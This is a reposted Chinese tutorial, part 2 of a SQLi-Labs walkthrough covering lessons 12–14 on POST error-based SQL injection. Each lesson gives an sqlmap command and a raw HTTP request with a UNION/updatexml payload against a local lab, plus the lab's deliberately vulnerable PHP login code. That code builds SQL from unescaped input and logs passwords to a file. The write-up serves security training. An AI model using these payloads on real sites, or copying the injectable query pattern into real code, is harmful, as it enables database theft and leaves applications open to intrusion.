码迷,mamicode.com
首页 > 数据库 > 详细

【Mysql sql inject】【入门篇】SQLi-Labs使用 part 2

时间:2016-05-25 23:47:06      阅读:276      评论:0      收藏:0      [点我收藏+]

标签:

  • Less-12 - POST - Error Based- Double quotes- String

1)知识点

    主要考察报错注入中的双引号闭合注入情况。

2)工具用法:

SQLMAP POST注入用法之一,注入点处加 * 号,也可以用-r选项。
sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-12/index.php" --data "uname=111*&passwd=111&submit=Submit" --current-db --threads 10 --batch --technique BES

3)手工注入

POST /hacker/sqli-labs-master/Less-12/index.php?id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98
 
uname=111") UNION ALL SELECT 1,updatexml(1,concat(0x7e,database()),1) #&passwd=111&submit=Submit

4)注入点代码

// take the variables
if(isset($_POST[uname]) && isset($_POST[passwd]))
{
$uname=$_POST[uname];
$passwd=$_POST[passwd];
 
//logging the connection parameters to a file for analysis.
$fp=fopen(result.txt,a);
fwrite($fp,User Name:.$uname."\n");
fwrite($fp,Password:.$passwd."\n");
fclose($fp);
 
 
// connectivity
$uname=".$uname.";   //双引号闭合
$passwd=".$passwd.";
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

 

  • Less-13- Double Injection- String- with twist

1)知识点

    主要考察报错注入中的单引号+括号闭合注入情况。

2)工具用法:

sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-13/index.php" --data "uname=111*&passwd=111&submit=Submit" --current-db --threads 10 --batch --technique BES

3)手工注入

POST /hacker/sqli-labs-master/Less-13/index.php?id=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
 
uname=111‘) union select 1,updatexml(1,concat(0x7e,database()),1) #&passwd=111&submit=Submit

4)注入点产生代码

// take the variables
if(isset($_POST[uname]) && isset($_POST[passwd]))
{
$uname=$_POST[uname];
$passwd=$_POST[passwd];
 
//logging the connection parameters to a file for analysis.
$fp=fopen(result.txt,a);
fwrite($fp,User Name:.$uname."\n");
fwrite($fp,Password:.$passwd."\n");
fclose($fp);
 
 
// connectivity
@$sql="SELECT username, password FROM users WHERE username=(‘$uname‘) and password=(‘$passwd‘) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

 

  • Less-14- Double Injection- Double quotes- String

1)工具用法:

sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-14/index.php" --data "uname=111*&passwd=111&submit=Submit" --current-db --threads 10 --batch --technique BES

2)手工注入

POST /hacker/sqli-labs-master/Less-14/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
 
uname=111" union select 1,updatexml(1,concat(0x7e,database()),1) #&passwd=111&submit=Submit

3)注入点产生代码

if(isset($_POST[uname]) && isset($_POST[passwd]))
{
$uname=$_POST[uname];
$passwd=$_POST[passwd];
 
//logging the connection parameters to a file for analysis.
$fp=fopen(result.txt,a);
fwrite($fp,User Name:.$uname."\n");
fwrite($fp,Password:.$passwd."\n");
fclose($fp);
 
 
// connectivity
$uname=".$uname.";
$passwd=".$passwd.";
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

 

【Mysql sql inject】【入门篇】SQLi-Labs使用 part 2

标签:

原文地址:http://www.cnblogs.com/17bdw/p/5529025.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!